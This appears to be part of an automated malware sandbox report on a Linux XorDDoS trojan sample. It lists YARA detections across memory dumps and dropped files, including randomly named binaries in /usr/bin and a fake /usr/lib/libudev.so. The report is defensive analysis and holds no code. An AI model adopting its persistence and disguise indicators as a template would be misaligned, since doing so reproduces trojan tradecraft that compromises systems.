Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/sosfbbrzmx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/sosfbbrzmx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/sosfbbrzmx, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/uhjkqkcgma, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/uhjkqkcgma, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/uhjkqkcgma, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/vnihfmehfy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/vnihfmehfy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/vnihfmehfy, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/oigyzaiygp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/oigyzaiygp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/oigyzaiygp, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/otlzwyqefc, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/otlzwyqefc, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/otlzwyqefc, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/ksagqhmoao, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/ksagqhmoao, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/eqoogeqyds, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/eqoogeqyds, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/ksagqhmoao, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/eqoogeqyds, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wutujskjnm, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/wutujskjnm, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/wutujskjnm, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/qxzsiorokf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/qxzsiorokf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/qxzsiorokf, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/gphlkawhxw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/gphlkawhxw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/gphlkawhxw, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/uzqdvpyngy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/uzqdvpyngy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/uzqdvpyngy, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/snluqxjnyb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/snluqxjnyb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/jeyjdycnpv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/jeyjdycnpv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/jeyjdycnpv, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/bgoiqqymph, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/bgoiqqymph, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/bgoiqqymph, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/dthtwwmqvu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/dthtwwmqvu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/dthtwwmqvu, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen

Source: ELF static info symbol of initial sample

.symtab present: no

Source: UDMp3dZ7nc.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: UDMp3dZ7nc.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: UDMp3dZ7nc.elf, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
